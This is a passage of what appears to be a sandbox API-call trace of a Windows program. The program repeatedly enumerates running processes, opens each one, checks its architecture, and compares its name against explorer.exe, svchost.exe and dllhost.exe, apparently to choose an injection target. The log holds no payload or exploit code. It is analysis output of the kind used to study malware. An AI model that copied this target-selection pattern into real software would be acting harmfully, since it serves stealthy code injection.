th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0243.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0243.021] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0243.021] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.021] CloseHandle (hObject=0xd8) returned 1 [0243.021] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0243.021] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0243.021] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0243.021] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0243.022] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0243.022] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.022] CloseHandle (hObject=0xd8) returned 1 [0243.022] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0243.023] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0243.023] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0243.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0243.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0243.024] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0243.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0243.026] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.027] CloseHandle (hObject=0xd8) returned 1 [0243.027] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0243.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0243.027] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.027] CloseHandle (hObject=0xd8) returned 1 [0243.027] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0243.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0243.028] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.028] CloseHandle (hObject=0xd8) returned 1 [0243.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0243.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0243.028] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.028] CloseHandle (hObject=0xd8) returned 1 [0243.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0243.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0243.029] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.029] CloseHandle (hObject=0xd8) returned 1 [0243.029] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0243.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0243.029] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.029] CloseHandle (hObject=0xd8) returned 1 [0243.030] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0243.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0243.030] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.030] CloseHandle (hObject=0xd8) returned 1 [0243.030] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0243.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0243.031] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.031] CloseHandle (hObject=0xd8) returned 1 [0243.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0243.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0243.031] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.031] CloseHandle (hObject=0xd8) returned 1 [0243.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0243.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0243.032] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.032] CloseHandle (hObject=0xd8) returned 1 [0243.032] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0243.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0243.032] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.032] CloseHandle (hObject=0xd8) returned 1 [0243.032] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0243.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0243.033] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.033] CloseHandle (hObject=0xd8) returned 1 [0243.033] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0243.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0243.034] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.034] CloseHandle (hObject=0xd8) returned 1 [0243.034] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0243.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0243.034] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.034] CloseHandle (hObject=0xd8) returned 1 [0243.034] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0243.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0243.035] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.035] CloseHandle (hObject=0xd8) returned 1 [0243.035] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0243.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0243.035] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.035] CloseHandle (hObject=0xd8) returned 1 [0243.035] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0243.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0243.036] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.036] CloseHandle (hObject=0xd8) returned 1 [0243.036] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0243.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0243.036] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.037] CloseHandle (hObject=0xd8) returned 1 [0243.037] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0243.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0243.037] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.037] CloseHandle (hObject=0xd8) returned 1 [0243.037] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0243.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0243.038] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.038] CloseHandle (hObject=0xd8) returned 1 [0243.038] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0243.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0243.038] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.038] CloseHandle (hObject=0xd8) returned 1 [0243.038] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0243.039] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0243.039] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0243.040] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0243.040] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0243.041] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0243.041] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.041] CloseHandle (hObject=0xd8) returned 1 [0243.041] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0243.041] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0243.042] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.042] CloseHandle (hObject=0xd8) returned 1 [0243.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0243.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0243.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0243.042] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0243.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0243.043] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.043] CloseHandle (hObject=0xd8) returned 1 [0243.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0243.044] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.044] CloseHandle (hObject=0xd8) returned 1 [0243.044] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0243.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0243.044] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0243.044] CloseHandle (hObject=0xd8) returned 1 [0243.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.045] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0243.045] CloseHandle (hObject=0xd4) returned 1 [0243.045] Sleep (dwMilliseconds=0x3e8) [0244.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0244.081] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0244.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0244.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0244.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0244.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0244.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0244.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0244.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0244.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0244.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0244.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0244.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.087] OpenProcess 